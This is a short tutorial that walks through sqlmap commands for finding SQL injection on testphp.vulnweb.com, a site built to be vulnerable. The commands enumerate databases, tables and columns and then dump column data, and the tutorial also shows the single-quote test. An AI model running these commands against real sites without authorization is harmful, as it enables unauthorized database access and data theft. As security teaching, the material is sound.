How to use SQLMAP to test a website for SQL Injection vulnerability with example.

 


In this article I explain how to test whether a website is safe from SQL injection using the SQLMAP penetration testing tool.

What is SQL Injection?

SQL Injection is a code injection technique where an attacker executes malicious SQL queries that control a web application’s database. With the right set of queries, a user can gain access to information stored in databases. SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL Injection.

Where can you use SQLMAP?

If you observe a web URL of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where cat=1 is the ‘GET’ parameter, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when the site is PHP-based.

A simple test to check whether your website is vulnerable is to replace the value in the GET request parameter with a single quote (').

Installing sqlmap

SQLMAP comes pre-installed with Kali Linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other Debian-based Linux systems using the command:

    sudo apt-get install sqlmap

Usage

In this article, we will make use of a website that is designed with vulnerabilities for demonstration purposes:

     http://testphp.vulnweb.com/listproducts.php?cat=1 

As you can see, there is a GET request parameter (cat = 1) that can be changed by the user by modifying the value of cat. So this website might be vulnerable to SQL injection of this kind.

    sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batch



Here we get two databases:

    [*] acuart
    [*] information_schema

Let's continue testing.

To try and access any of the databases, we have to slightly modify our command. We now use -D to specify the name of the database that we wish to access, and once we have access to the database, we would want to see whether we can access the tables. For this, we use the --tables option. Let us access the acuart database.

    sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables --batch



 

If we want to view the columns of a particular table, we can use the following command, in which we use -T to specify the table name, and --columns to query the column names. We will try to access the table ‘artists’.

    sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists --columns --batch



Now for our last command, which dumps the data from the columns.

Similarly, we can access the information in a specific column by using the following command, where -C can be used to specify multiple column names separated by commas, and the --dump option retrieves the data.

    sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists -C aname --dump --batch



Note:

This tutorial is for educational purposes only. Do not use it for illegal activities.
